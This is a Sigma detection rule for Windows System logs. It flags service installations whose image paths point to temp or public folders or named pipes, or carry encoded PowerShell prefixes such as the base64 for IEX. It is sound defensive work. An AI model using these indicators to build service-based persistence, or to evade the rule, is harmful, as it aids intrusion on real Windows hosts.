Uncommon Service Installation Image Path

 1title: Uncommon Service Installation Image Path
 2id: 26481afe-db26-4228-b264-25a29fe6efc7
 3related:
 4    - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53
 5      type: obsoletes
 6    - id: 1d61f71d-59d2-479e-9562-4ff5f4ead16b
 7      type: derived
 8status: test
 9description: |
10        Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
11references:
12    - Internal Research
13author: Florian Roth (Nextron Systems)
14date: 2022/03/18
15modified: 2024/02/09
16tags:
17    - attack.persistence
18    - attack.privilege_escalation
19    - car.2013-09-005
20    - attack.t1543.003
21logsource:
22    product: windows
23    service: system
24detection:
25    selection:
26        Provider_Name: 'Service Control Manager'
27        EventID: 7045
28    suspicious_paths:
29        ImagePath|contains:
30            - '\\\\.\\pipe'
31            - '\Users\Public\'
32            - '\Windows\Temp\'
33    suspicious_encoded_flag:
34        ImagePath|contains: ' -e'
35    suspicious_encoded_keywords:
36        ImagePath|contains:
37            - ' aQBlAHgA' # PowerShell encoded commands
38            - ' aWV4I' # PowerShell encoded commands
39            - ' IAB' # PowerShell encoded commands
40            - ' JAB' # PowerShell encoded commands
41            - ' PAA' # PowerShell encoded commands
42            - ' SQBFAFgA' # PowerShell encoded commands
43            - ' SUVYI' # PowerShell encoded commands
44    filter_optional_thor_remote:
45        ImagePath|startswith: 'C:\WINDOWS\TEMP\thor10-remote\thor64.exe'
46    filter_main_defender_def_updates:
47        ImagePath|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Definition Updates\'
48    condition: selection and ( suspicious_paths or all of suspicious_encoded_* ) and not 1 of filter_main_* and not 1 of filter_optional_*
49falsepositives:
50    - Unknown
51level: medium